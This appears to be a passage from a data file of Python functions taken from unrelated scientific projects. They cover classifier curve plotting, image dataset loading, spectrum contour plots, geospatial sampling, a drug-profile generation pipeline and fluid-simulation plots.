ax.annotate(txt, (x[j], y[j]), fontsize=5)\n auc = np.trapz(y,x)\n if i == 0:\n label = \"ML\"\n if i == 1:\n label = \"Null YFP\"\n if i == 2:\n label = \"Null DAPI\" \n ax.plot(x, y, linewidth=2.0, color=colors[label], label=\"{} Model, AUC = {}\".format(label, str(round(auc, 2)))) \n i += 1\n plt.title(\"{} Curves\".format(plot), fontname=\"Times New Roman\", fontsize=12)\n ax.set_xlim((0,1))\n ax.set_ylim((0,1))\n plt.rc('font',family='Times New Roman')\n plt.xticks(fontname=\"Times New Roman\", fontsize=12)\n plt.yticks(fontname=\"Times New Roman\", fontsize=12)\n if plot == \"ROC\":\n ax.set_xlabel(\"False Positive Rate\", fontname=\"Times New Roman\", fontsize=12)\n ax.set_ylabel(\"True Positive Rate\",fontname=\"Times New Roman\", fontsize=12)\n ax.plot([0, .5, 1], [0,.5, 1], linestyle=\"--\", linewidth=1.0, color=\"black\")\n ax.legend(loc='lower right',prop={\"family\":\"Times New Roman\", \"size\":10})\n plt.savefig(\"matplotlib_figures/ROC.png\", dpi=300)\n if plot == \"PRC\":\n positives = TPs + FNs ##doesn't matter which map we use, positive prevalence independent of map \n total = TPs + FPs + TNs + FNs \n positive_prevalence = positives / float(total)\n ax.hlines(y=positive_prevalence, xmin=0, xmax=1, linestyle=\"--\", linewidth=1.0, color=\"black\")\n ax.set_xlabel(\"Recall\", fontname=\"Times New Roman\", fontsize=12)\n ax.set_ylabel(\"Precision\",fontname=\"Times New Roman\", fontsize=12)\n ax.set_xlim((0,1))\n ax.set_ylim((0,1))\n ax.legend(loc='upper right',prop={\"family\":\"Times New Roman\", \"size\":10})\n plt.savefig(\"matplotlib_figures/PRC.png\", dpi=300)", "def __init__(self,\n ann_file,\n img_prefix,\n img_means,\n img_stds,\n img_expected_sizes,\n size_divisor=None,\n flip_ratio=0,\n be_cell_size=32,\n be_random_ratio=0.5,\n proposal_file=None,\n num_max_proposals=1000,\n with_mask=False,\n with_crowd=False,\n with_label=True,\n test_mode=False,\n with_background_erasing=False,\n debug=False):\n # load annotations from annotation file\n self.img_infos = self.load_annotations(ann_file)\n # prefix of image path\n self.img_prefix = img_prefix\n # image normalization parameters\n self.img_means, self.img_stds = img_means, img_stds\n # img_expected_sizes list\n self.img_expected_sizes = img_expected_sizes \\\n if isinstance(img_expected_sizes, list) else [img_expected_sizes]\n assert is_list_of(self.img_expected_sizes, tuple)\n # size divisor\n self.size_divisor = size_divisor\n # flip ratio\n self.flip_ratio = flip_ratio\n # background erasing settings\n self.be_cell_size = be_cell_size\n self.be_random_ratio = be_random_ratio\n\n # load the pkl proposal file\n if proposal_file is not None:\n self.proposals = self.load_proposals(proposal_file)\n else:\n self.proposals = None\n self.num_max_proposals = num_max_proposals\n\n # filter images with no annotation during training\n if not test_mode:\n valid_inds = self._filter_imgs()\n self.img_infos = [self.img_infos[i] for i in valid_inds]\n if self.proposals is not None:\n self.proposals = [self.proposals[i] for i in valid_inds]\n\n # with mask or not\n self.with_mask = with_mask\n # with crowd object or not\n self.with_crowd = with_crowd\n # training with label or not\n self.with_label = with_label\n # test mode\n self.test_mode = test_mode\n # with background erasing or not\n self.with_background_erasing = with_background_erasing\n # debug mode\n self.debug = debug\n if self.debug:\n self.img_infos = self.img_infos[:50]\n\n # set aspect ratio flag for images\n if not self.test_mode:\n self._set_group_flag()\n\n # transforms\n self.img_transforms = ImageTransforms(img_means=self.img_means,\n img_stds=self.img_stds,\n size_divisor=self.size_divisor)\n self.bbox_transforms = BboxTransforms()\n self.mask_transforms = MaskTransforms()\n self.background_erasing = BackgroundErasing()", "def ShowOneContourCutBKG(index,all_images,all_pointing,thex0,they0,all_titles,object_name,all_expo,dir_top_img,all_filt):\n plt.figure(figsize=(15,6))\n spec_index_min=100 # cut the left border\n spec_index_max=1900 # cut the right border\n star_halfwidth=70\n \n YMIN=-100\n YMAX=100\n \n figname='contourCutBKG_{}_{}.pdf'.format(all_filt[index],index)\n \n figfilename=os.path.join(dir_top_img,figname) \n \n #center is approximately the one on the original raw image (may be changed)\n #x0=int(all_pointing[index][0])\n x0=int(thex0[index])\n \n \n # Extract the image \n full_image=np.copy(all_images[index])\n \n # refine center in X,Y\n star_region_X=full_image[:,x0-star_halfwidth:x0+star_halfwidth]\n \n profile_X=np.sum(star_region_X,axis=0)\n profile_Y=np.sum(star_region_X,axis=1)\n\n NX=profile_X.shape[0]\n NY=profile_Y.shape[0]\n \n X_=np.arange(NX)\n Y_=np.arange(NY)\n \n avX,sigX=weighted_avg_and_std(X_,profile_X**4) # take squared on purpose (weigh must be >0)\n avY,sigY=weighted_avg_and_std(Y_,profile_Y**4)\n \n x0=int(avX+x0-star_halfwidth)\n \n \n # find the center in Y on the spectrum\n yprofile=np.sum(full_image[:,spec_index_min:spec_index_max],axis=1)\n y0=np.where(yprofile==yprofile.max())[0][0]\n\n # cut the image in vertical and normalise by exposition time\n reduc_image=full_image[y0-10:y0+10,:]=0\n reduc_image=full_image[y0+YMIN:y0+YMAX,x0:spec_index_max]/all_expo[index]\n \n reduc_image[:,0:100]=0 # erase central star\n \n X_Size_Pixels=np.arange(0,reduc_image.shape[1])\n Y_Size_Pixels=np.arange(0,reduc_image.shape[0])\n Transverse_Pixel_Size=Y_Size_Pixels-int(float(Y_Size_Pixels.shape[0])/2.)\n \n # calibration in wavelength\n #grating_name=all_filt[index].replace('dia ','')\n grating_name=get_disperser_filtname(all_filt[index])\n \n lambdas=Pixel_To_Lambdas(grating_name,X_Size_Pixels,all_pointing[index],True)\n \n #if grating_name=='Ron200':\n # holo = Hologram('Ron400',verbose=True)\n #else: \n # holo = Hologram(grating_name,verbose=True)\n #lambdas=holo.grating_pixel_to_lambda(X_Size_Pixels,all_pointing[index])\n #if grating_name=='Ron200':\n # lambdas=lambdas*2.\n \n\n X,Y=np.meshgrid(lambdas,Transverse_Pixel_Size) \n T=np.transpose(reduc_image)\n \n \n cs=plt.contourf(X, Y, reduc_image, 100, alpha=1., cmap='jet',origin='lower')\n C = plt.contour(X, Y, reduc_image ,50, colors='white', linewidth=.001,origin='lower') \n \n \n cbar = plt.colorbar(cs) \n \n for line in LINES:\n if line == O2 or line == HALPHA or line == HBETA or line == HGAMMA:\n plt.plot([line['lambda'],line['lambda']],[YMIN,YMAX],'-',color='lime',lw=0.5)\n plt.text(line['lambda'],YMAX*0.8,line['label'],verticalalignment='bottom', horizontalalignment='center',color='lime', fontweight='bold',fontsize=16)\n \n \n \n plt.axis([X.min(), X.max(), Y.min(), Y.max()]); plt.grid(True)\n plt.title(all_titles[index])\n plt.grid(color='white', ls='solid')\n plt.text(200,-5.,all_filt[index],verticalalignment='bottom', horizontalalignment='center',color='yellow', fontweight='bold',fontsize=16)\n plt.xlabel('$\\lambda$ (nm)')\n plt.ylabel('pixels')\n plt.ylim(YMIN,YMAX)\n plt.xlim(0.,1200.)\n plt.savefig(figfilename)", "def truncate_profile(profileDict, startInd, endInd):\n currNumSamples= get_sample_count(profileDict)\n # Update the count of the number of samples\n set_sample_count(profileDict, endInd - startInd + 1)\n # Update the info object \n __truncate_info(profileDict[\"info\"], startInd, endInd, currNumSamples)\n # Update the samples\n sampleDict= profileDict[\"samples\"]\n for key in sampleDict:\n __truncate_all_lists(sampleDict[key], startInd, endInd)", "def _pre_draw_bge(self):\r\n self._pre_draw_common()\r\n # draw rays\r\n self._drawRays()", "def sampleFromShapes(shapes,bounds,dx=10.0,nmax=None,testPercent=1.0,classBalance=None,extent=None,Nsamp=100,\n h1=100.0,h2=300.0,touch_center=True):\n\n xmin,ymin,xmax,ymax = bounds\n shptype = shapes[0]['geometry']['type']\n if shptype not in ['Point','Polygon']:\n raise Exception('Only polygon and point data types supported!')\n\n #Get the shapes projected into an orthographic projection centered on the data \n pshapes,proj = getProjectedShapes(shapes,xmin,xmax,ymin,ymax)\n\n if shptype != 'Polygon':\n if classBalance is None:\n raise Exception('Class balance *must* be selected when input data are points.')\n else:\n #what is the class balance (assuming polygons)\n if classBalance is None:\n classBalance = getClassBalance(pshapes,bounds,proj)\n\n #get the \"yes\" sample points\n yespoints,nrows,ncols,xvar,yvar,yesidx = getYesPoints(pshapes,proj,dx,nmax,touch_center=touch_center)\n\n #Calculations of how many training and test points are the same for points and polygons.\n #Also sampling of yes points is the same regardless of vector type\n Nmesh = nrows*ncols\n\n #Nsamp may not have been set - until we support custom extents by polygon, just assume that default Nsamp is = Nmesh\n if Nsamp is None:\n print('Assuming total number of samples is the same as the number of pixels in sampling grid. This may not work...')\n Nsamp = Nmesh\n \n NyesTot = len(yespoints)\n NnoTot = Nmesh - NyesTot\n NyesSampTest = int(Nsamp * classBalance * testPercent)\n NyesSampTrain = int(Nsamp * classBalance * (1-testPercent))\n YesSampTot = NyesSampTest + NyesSampTrain\n ratio = NyesTot/float(YesSampTot)\n if YesSampTot > NyesTot:\n raise Exception('Your total number of desired \"yes\" sample pixels is greater than the number available.')\n NnoSampTest = int(Nsamp*(1-classBalance)*testPercent)\n NnoSampTrain = int(Nsamp*(1-classBalance)*(1-testPercent))\n NoSampTot = NnoSampTest + NnoSampTrain\n if NoSampTot > NnoTot:\n raise Exception('Your total number of desired \"no\" sample pixels is greater than the number available.')\n YesTestPoints,RemainingYesPoints = sampleYes(yespoints,NyesSampTest)\n YesTrainPoints,RemainingYesPoints = sampleYes(RemainingYesPoints,NyesSampTrain)\n\n #Sampling of \"no\" points differs between points and polygons\n if shptype == 'Point':\n #for point data, create a boolean grid located on xvar/yvar\n #create a donut around each pixel containing a yes point(s), where 1 is assigned to\n #pixels more than h1 meters from yes point and less than h2 meters from yes point.\n nosampleimg = getNoSampleGrid(yespoints,xvar,yvar,dx,h1,h2)\n NoTestPoints,nosampleimg,sampleidx = sampleNoPoints(nosampleimg,NnoSampTest,xvar,yvar)\n NoTrainPoints,nosampleimg,sampleidx = sampleNoPoints(nosampleimg,NnoSampTrain,xvar,yvar)\n else:\n if extent is None: #we're using the default bounding box of the coverage data\n NoTestPoints,nosampleidx = sampleNo(xvar,yvar,NnoSampTest,yesidx)\n NoTrainPoints,nosampleidx = sampleNo(xvar,yvar,NnoSampTrain,nosampleidx)\n else:\n raise Exception('Custom extents not yet supported') \n\n #project all of the point data sets back to lat/lon\n YesTestPoints = projectBack(YesTestPoints,proj)\n YesTrainPoints = projectBack(YesTrainPoints,proj)\n NoTestPoints = projectBack(NoTestPoints,proj)\n NoTrainPoints = projectBack(NoTrainPoints,proj)\n return (YesTestPoints,YesTrainPoints,NoTestPoints,NoTrainPoints,xvar,yvar,pshapes,proj)", "def generate_profiles_without_network(options):\n\n # Start marker for time measure\n start = time.time()\n\n print(\"\\n\\t\\t-----------------------------------------------------------------------------------------------------------------------\\n\")\n print(\"\\t\\tStarting Drug Interactions ANAlysis (DIANA), a program created by @OLIVA'S LAB. First part: Generation of drug profiles\\n\")\n print(\"\\t\\t-----------------------------------------------------------------------------------------------------------------------\\n\")\n\n # Get the script path\n main_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n toolbox_dir = os.path.join(main_path, 'diana/toolbox')\n\n # Create a directory for the data\n data_dir = os.path.join(options.workspace, \"profiles\")\n create_directory(data_dir)\n\n # Create a directory for the random networks\n other_data_dir = os.path.join(options.workspace, \"other_data\")\n create_directory(other_data_dir)\n\n random_networks_dir = os.path.join(other_data_dir, \"random_networks\")\n create_directory(random_networks_dir)\n\n # Create a drug instance\n drug_instance = diana_drug.Drug(options.drug_name)\n\n\n\n #--------------------------------------#\n # GET INFORMATION FROM CONFIG FILE #\n #--------------------------------------#\n\n # Read the config file\n config_file = os.path.join(main_path, 'config.ini')\n config = ConfigParser.ConfigParser()\n config.read(config_file)\n\n\n\n #------------------------#\n # TARGETS CONTROLLER #\n #------------------------#\n\n # TARGETS CONTROLLER: Checks the targets provided by the user. If necessary, performs a search \n # in BIANA database to obtain more targets\n\n # Check if the targets file is provided\n if options.targets and os.path.isfile(options.targets):\n drug_instance.obtain_targets_from_file(options.targets, options.proteins_type_id)\n else:\n # Create a connection to BIANA database\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n # Obtain the targets from BIANA\n drug_instance.obtain_targets_from_BIANA(biana_cnx, options.proteins_type_id, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n\n print( \" DIANA INFO:\\tThe targets provided for the drug {} are:\\n\\t\\t{}.\\n\".format( options.drug_name, ', '.join([ str(x) for x in drug_instance.targets]) ) )\n\n\n\n #------------------------------------------#\n # CREATE DIRECTORIES AND GENERAL FILES #\n #------------------------------------------#\n\n # Create a directory for the drug\n drug_id = diana_drug.generate_drug_id(drug_instance.drug_name, drug_instance.targets, 'network_of_expansion')\n drug_dir = os.path.join(data_dir, drug_id)\n create_directory(drug_dir)\n print(' DIANA INFO:\\tThe ID given to the drug, which will be used to create a directory and store the results, is: {}\\n'.format(drug_id))\n\n # Create a directory for the dcTargets results\n dctargets_dir = os.path.join(drug_dir, 'dctargets_profiles')\n create_directory(dctargets_dir)\n\n # Create a directory for the dcGUILD results\n dcguild_dir = os.path.join(drug_dir, 'dcguild_profiles')\n create_directory(dcguild_dir)\n\n # Create a directory for the dcStructure results\n dcstructure_dir = os.path.join(drug_dir, 'dcstructure_profiles')\n create_directory(dcstructure_dir)\n\n # Create a directory for the dcATCs results\n ATCs_dir = os.path.join(drug_dir, 'dcatc_profiles')\n create_directory(ATCs_dir)\n\n # Create a directory for the dcse results\n SE_dir = os.path.join(drug_dir, 'dcse_profiles')\n create_directory(SE_dir)\n\n # Create a targets file\n targets_file = os.path.join(dctargets_dir, '{}_targets.txt'.format(drug_instance.drug_name))\n diana_drug.create_targets_file(drug_instance.targets, targets_file)\n\n\n\n #------------------------#\n # NETWORK GENERATION #\n #------------------------#\n\n # NETWORK GENERATION: Generates a network expanding it from the targets provided.\n # The network is expanded as many neighbors as indicated in the parameter 'radius'.\n\n # We create a network of expansion from the targets\n print(' DIANA INFO:\\tGenerating network for {}. This can take a few minutes...\\n'.format(options.drug_name))\n\n network_dir = os.path.join(drug_dir, 'network_of_expansion')\n create_directory(network_dir)\n node_file = os.path.join(network_dir, '{}_network.nodes'.format(drug_instance.drug_name))\n edge_file = os.path.join(network_dir, '{}_network.edges'.format(drug_instance.drug_name))\n translation_file = os.path.join(network_dir, '{}_network_trans_to_{}.trans'.format(drug_instance.drug_name, options.proteins_type_id))\n targets_translation_file = os.path.join(network_dir, 'targets_to_BIANA.trans')\n\n if not fileExist(edge_file):\n\n # By direct command (it works)\n restriction = process_restriction(options.restriction)\n command = 'python {} -iseed {} -radius {} -taxid {} -stype {} -ttype {} -trans {} -strans {} -node {} -edge {} -db {} -up {} {}'.format(\n os.path.join(toolbox_dir, 'generate_netscore_files_vapr2017.py'),\n targets_file, options.radius, options.taxid, options.proteins_type_id, options.proteins_type_id, translation_file, targets_translation_file, node_file, edge_file,\n config.get('BIANA', 'database'), config.get('BIANA', 'unification_protocol'), restriction\n )\n os.system(command)\n\n # By importing the module (it does not work!!!)\n # restricted_to_TAP, restricted_to_Y2H, restricted_to_user, except_TAP, except_Y2H, except_user = network_generation.check_restriction(options.restriction)\n # network_generation.generate_network(drug_instance.targets, drug_instance.type_id, options.radius, options.taxid, translation_file, options.proteins_type_id, node_file, edge_file,\n # restricted_to_TAP = restricted_to_TAP, restricted_to_Y2H = restricted_to_Y2H, restricted_to_user = restricted_to_user,\n # except_TAP = except_TAP, except_Y2H = except_Y2H, except_user = except_user,\n # database = options.database, unification_protocol = options.unification_protocol,\n # output_format = 'sif', verbose = False)\n\n else:\n print(' DIANA INFO:\\tThe network of expansion for {} was already done and it has been skipped.\\n'.format(options.drug_name))\n\n network_instance = network_analysis.Network(edge_file, None, 'biana', 'sif')\n targets_in_network = get_targets_in_network_of_expansion(node_file)\n\n # Create a directory of random networks corresponding to this network\n random_networks_dir = os.path.join(random_networks_dir, '{}_network'.format(drug_instance.drug_name))\n create_directory(random_networks_dir)\n\n\n # Check if the number of targets provided is sufficient for the analysis\n if len(targets_in_network) < 3:\n raise diana_drug.InsufficientTargets(targets_in_network)\n else:\n print( \" DIANA INFO:\\tThe targets found in the network are:\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in targets_in_network]) ) )\n\n\n\n\n #--------------------------------#\n # SCORING OF NETWORKS (GUILD) #\n #--------------------------------#\n\n # Run GUILD\n print(\" DIANA INFO:\\tRunning GUILD (network scoring program).\\n\")\n\n # Create a directory for GUILD results\n guild_output_dir = os.path.join(drug_dir, 'guild_output')\n create_directory(guild_output_dir)\n\n # Create targets file for the targets in the network (it will be used by GUILD)\n network_targets_file = os.path.join(guild_output_dir, '{}_targets_in_network.txt'.format(drug_instance.drug_name))\n diana_drug.create_targets_file(targets_in_network, network_targets_file)\n\n # Run GUILD\n pvalue_file = os.path.join(guild_output_dir, 'output_scores.sif.netcombo.pval')\n if not fileExist(pvalue_file):\n\n guild_command = 'python {} {} {} {} {} {} {}'.format( os.path.join(toolbox_dir, 'run_guild.py'), drug_dir, network_targets_file, edge_file, guild_output_dir, random_networks_dir, config.get('Paths', 'guild_path') )\n os.system(guild_command)\n print(' DIANA INFO:\\tGUILD has finished.\\n')\n\n else:\n print(' DIANA INFO:\\tThe scoring of the network with GUILD for {} was already done and it has been skipped.\\n'.format(options.drug_name))\n\n # Creating an instance of the file generated by GUILD\n guild_profile_instance = network_analysis.GUILDProfile(pvalue_file, network_instance.type_id, 100)\n\n # Translate the NODE profile to protein_type_id if the type of id is 'biana'\n if guild_profile_instance.type_id == 'biana' and translation_file:\n output_file = os.path.join(guild_output_dir, 'node_profile_top_100_{}.txt'.format(options.proteins_type_id))\n guild_profile_geneid = guild_profile_instance.translate_pvalue_file(translation_file, options.proteins_type_id, output_file, verbose=False)\n\n\n\n #-------------------------------#\n # GENERATE DCGUILD PROFILES #\n #-------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF dcGUILD PROFILES\\n')\n\n # Copy the pvalue_file at the dcguild directory\n new_pvalue_file = os.path.join(dcguild_dir, 'output_scores.sif.netcombo.pval')\n shutil.copyfile(pvalue_file, new_pvalue_file)\n\n # Score the network\n scored_network_file = os.path.join(dcguild_dir, 'network_scored.txt')\n scored_network_instance = network_instance.score_network(guild_profile_instance.node_to_values, scored_network_file)\n\n # Get the list of thresholds to create the profiles\n if options.threshold_list and fileExist(options.threshold_list):\n threshold_list = get_values_from_threshold_file(options.threshold_list)\n else:\n threshold_list = [1, 5, 10, 20, 50]\n print(' DIANA INFO:\\tList of percentages used to define the drug profiles: {}\\n'.format(', '.join([str(x) for x in threshold_list])))\n\n # Load the files go and gene2go files for the functional profiles\n print(\" DIANA INFO:\\tLoading GOATOOLS for the functional analysis. Remember to update the files go-basic.obo and gene2go.\")\n print(\"\\t\\tpython /path/to/diana/scripts/download_go_files.py\\n\")\n obodag = GODag(os.path.join(main_path, \"diana/toolbox/go-basic.obo\"))\n geneid2gos_human = read_ncbi_gene2go(os.path.join(main_path, \"diana/toolbox/gene2go\"), taxids=[9606])\n\n for top_threshold in threshold_list:\n\n output_file = os.path.join(dcguild_dir, 'node_profile_top_{}_{}.txt'.format(str(top_threshold), guild_profile_instance.type_id))\n if not fileExist(output_file):\n\n # Generate the NODE profile from the top % scoring nodes\n node_profile_instance = guild_profile_instance.create_node_profile(top_threshold, output_file)\n\n # Translate the NODE profile to protein_type_id if the type of id is 'biana'\n if node_profile_instance.type_id == 'biana' and translation_file:\n output_file = os.path.join(dcguild_dir, 'node_profile_top_{}_{}.txt'.format(str(top_threshold), options.proteins_type_id))\n node_profile_geneid = node_profile_instance.translate_pvalue_file(translation_file, options.proteins_type_id, output_file, verbose=False)\n\n\n output_file = os.path.join(dcguild_dir, 'functional_profile_top_{}_{}.txt'.format(str(top_threshold), options.proteins_type_id))\n if not fileExist(output_file):\n\n # Generate the FUNCTIONAL profile from the top % scoring nodes of the pvalue file\n if node_profile_instance.type_id == 'biana' and translation_file:\n functional_profile_instance = node_profile_geneid.create_functional_profile(obodag, geneid2gos_human, guild_profile_geneid.node_to_values, output_file)\n else:\n functional_profile_instance = node_profile_instance.create_functional_profile(obodag, geneid2gos_human, guild_profile_instance.node_to_values, output_file)\n\n\n output_file = os.path.join(dcguild_dir, 'edge_profile_top_{}_{}.txt'.format(str(top_threshold), guild_profile_instance.type_id))\n if not fileExist(output_file):\n\n # Generate the EDGE profile from the top % scoring nodes of the pvalue file\n edge_profile_instance = scored_network_instance.create_edge_profile(guild_profile_instance.node_to_values, top_threshold, output_file)\n\n # Translate the EDGE profile to protein_type_id if the type of id is 'biana'\n if edge_profile_instance.type_id == 'biana' and translation_file:\n output_file = os.path.join(dcguild_dir, 'edge_profile_top_{}_{}.txt'.format(str(top_threshold), options.proteins_type_id))\n edge_profile_geneid = edge_profile_instance.translate_network(translation_file, options.proteins_type_id, output_file, verbose=False)\n\n\n\n #---------------------------------#\n # GENERATE DCTARGETS PROFILES #\n #---------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF dcTARGETS PROFILES\\n')\n\n # Create PFAM profile from targets\n pfam_file = os.path.join(dctargets_dir, 'pfam_profile.txt')\n\n if not fileExist(pfam_file):\n # Create a connection to BIANA database\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n # Obtain the PFAMs from BIANA\n drug_instance.obtain_pfams_from_targets(biana_cnx, pfam_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_pfams_from_file(pfam_file)\n\n print( \" DIANA INFO:\\tThe PFAMs obtained from the targets are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.pfams]) ) )\n\n\n # Create the FUNCTIONAL profile from targets\n output_file = os.path.join(dctargets_dir, 'targets_functional_profile.txt')\n if not fileExist(output_file):\n\n if guild_profile_instance.type_id == 'biana' and translation_file:\n #targets_in_network_geneid = translate_targets_to_type_id(targets_translation_file, targets_in_network)\n #targets_functional_profile_instance = top_scoring.functional_top_scoring(obodag, geneid2gos_human, guild_profile_geneid.node_to_values.keys(), targets_in_network_geneid, output_file)\n # First we add the targets that are not in the network among all the nodes in the network, to use them as background\n # Because if one of them is not among the background genes, the program raises an error!\n all_nodes_geneid = set(guild_profile_geneid.node_to_values.keys())\n for target in drug_instance.targets:\n all_nodes_geneid.add(target)\n top_scoring.functional_top_scoring(obodag, geneid2gos_human, list(all_nodes_geneid), drug_instance.targets, output_file)\n else:\n # Here we also add the targets that are not in the network among all the nodes in the network, to use them as background\n all_nodes_geneid = set(guild_profile_instance.node_to_values.keys())\n for target in drug_instance.targets:\n all_nodes_geneid.add(target)\n top_scoring.functional_top_scoring(obodag, geneid2gos_human, list(all_nodes_geneid), drug_instance.targets, output_file)\n\n\n\n #-----------------------------------#\n # GENERATE DCSTRUCTURE PROFILES #\n #-----------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF dcSTRUCTURE PROFILES\\n')\n\n # Obtain the SMILES of the compound from the database\n structure_file = os.path.join(dcstructure_dir, 'structure_profile.txt')\n\n if not fileExist(structure_file):\n # Create a connection to BIANA database\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n # Obtain the PFAMs from BIANA\n drug_instance.obtain_SMILES_from_BIANA(biana_cnx, structure_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_SMILES_from_file(structure_file)\n\n print( \" DIANA INFO:\\tThe SMILES obtained are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.smiles]) ) )\n\n\n\n #---------------------------#\n # GENERATE ATC PROFILES #\n #---------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF ATCs PROFILES\\n')\n\n #inside TARGETS CONTROLLER insert function that creates directory. By now: ATC_dir\n ATC_file = os.path.join(ATCs_dir,'ATC_profile.txt')\n\n if not fileExist(ATC_file):\n #search in BIANA\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n drug_instance.obtain_ATCs_from_BIANA(biana_cnx, ATC_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_ATCs_from_file(ATC_file)\n print( \" DIANA INFO:\\tThe ATCs obtained from the targets are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.ATCs])))\n\n\n\n #-----------------------------------#\n # GENERATE SIDE EFFECT PROFILES #\n #-----------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF SEs PROFILES\\n')\n\n SE_file = os.path.join(SE_dir,'SE_profile.txt')\n\n if not fileExist(SE_file):\n #search in BIANA\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n drug_instance.obtain_SE_from_BIANA(biana_cnx, SE_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_SE_from_file(SE_file)\n if len(drug_instance.SEs) > 0:\n print( \" DIANA INFO:\\tThe Side Effects obtained from the targets are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.SEs])))\n\n\n\n # End marker for time\n end = time.time()\n print('\\n DIANA INFO:\\tTIME OF EXECUTION: {:.3f} seconds or {:.3f} minutes.\\n'.format(end - start, (end - start) / 60))\n\n return", "def profile(script, argv, timer, pickle_protocol, dump_filename, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n __profile__(filename, code, globals_,\n timer=timer, pickle_protocol=pickle_protocol,\n dump_filename=dump_filename, mono=mono)", "def basicplots(self,\r\n p,\r\n Tavg=None,\r\n Snap=None,\r\n Snap_X=None,\r\n Snap_Y=None,\r\n Snap_Z=None,\r\n Point=None,\r\n dns_profiles=False):\r\n #draw the basic figures\r\n #self.getMean(p, Tavg, avgScalar)\r\n zmax=np.shape(Tavg.u)[2]\r\n if dns_profiles:\r\n self.getdns()\r\n #avgScalar plays the role of Scalar\r\n # basic plots\r\n if p.avgVelocities and Tavg is not None:\r\n #plt.figure(figsize=[30,20])\r\n #specify the length and width of the figure, unit is inch, 1 inch=2.54cm.\r\n #dpi of my computer:13_U_U*7_U8, dpi is the number of pixel point per inch ?\r\n\r\n #compare LES streamwise velocity profile with that of D_US\r\n fig, axs = plt.subplots(2, 3, tight_layout=True)\r\n axs[0, 0].plot(p.z_uv[0:zmax], Tavg.uMean, 'b')\r\n if dns_profiles:\r\n axs[0, 0].plot(self.dns_z, self.dns_u, 'r')\r\n axs[0, 0].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle u \\rangle$')\r\n \r\n\r\n #compare LES streamwise velocity profile with that of D_US and Log Law in a semilog coordinate\r\n kappa = p.vonk\r\n z0 = p.zo #aerodynamic surface roughness, demensionaless\r\n loglaw = 1 / kappa * np.log(p.z_uv[0:zmax] / z0) # rough wall\r\n p1, = axs[0, 1].semilogx(\r\n p.z_uv[0:zmax], loglaw, 'k') # , is necessary for plot, semilog etc.\r\n p2 = axs[0, 1].scatter(p.z_uv[0:zmax],\r\n Tavg.uMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n p3, = axs[0, 1].semilogx(self.dns_z, self.dns_u, 'r')\r\n axs[0, 1].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle \\bar{\\tilde{u}} \\rangle$',\r\n xlim=[0.01, 1])\r\n if dns_profiles:\r\n axs[0, 1].legend([p1, p2, p3], ['Log Law', 'LES', 'DNS'])\r\n else:\r\n axs[0, 1].legend([p1, p2], ['Log Law', 'LES'])\r\n\r\n #compare LES's profiles of uw,txz,txz+uw with that of D_US\r\n p1 = axs[0, 2].scatter(p.z_w[0:zmax],\r\n -Tavg.uwMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n p2 = axs[0, 2].scatter(p.z_w[0:zmax],\r\n -Tavg.txzMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='c')\r\n p3 = axs[0, 2].scatter(p.z_w[0:zmax],\r\n -Tavg.txzMean - Tavg.uwMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='k')\r\n if dns_profiles:\r\n p4, = axs[0, 2].plot(self.dns_z, -self.dns_uw, 'b')\r\n p5, = axs[0, 2].plot(self.dns_z, self.dns_tau, 'c')\r\n p6, = axs[0, 2].plot(self.dns_z, self.dns_tau - self.dns_uw,\r\n 'k') #what are these variables' meaning?\r\n axs[0, 2].plot(p.z_w[0:zmax], (1 - p.z_w[0:zmax]), 'g')\r\n #x+y=1\r\n axs[0, 2].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle -u^\\prime w^\\prime \\rangle$')\r\n #use \\ to acquire ' in the label text\r\n if dns_profiles:\r\n axs[0, 2].legend([p1, p2, p3, p4, p5, p6], [\r\n \"LES:\"+r'$-\\langle u^\\prime w^\\prime\\rangle$',\r\n \"LES:\"+r'$-\\langle txz \\rangle$',\r\n \"LES:\"+r'$-(\\langle txz \\rangle + \\langle u^\\prime w^\\prime \\rangle)$',\r\n \"DNS:\"+r'$-\\langle u^\\prime w^\\prime\\rangle$',\r\n \"DNS:\"+r'$-\\langle txz \\rangle$',\r\n \"DNS:\"+r'$-(\\langle txz \\rangle + \\langle u^\\prime w^\\prime \\rangle)$'\r\n ])\r\n else:\r\n 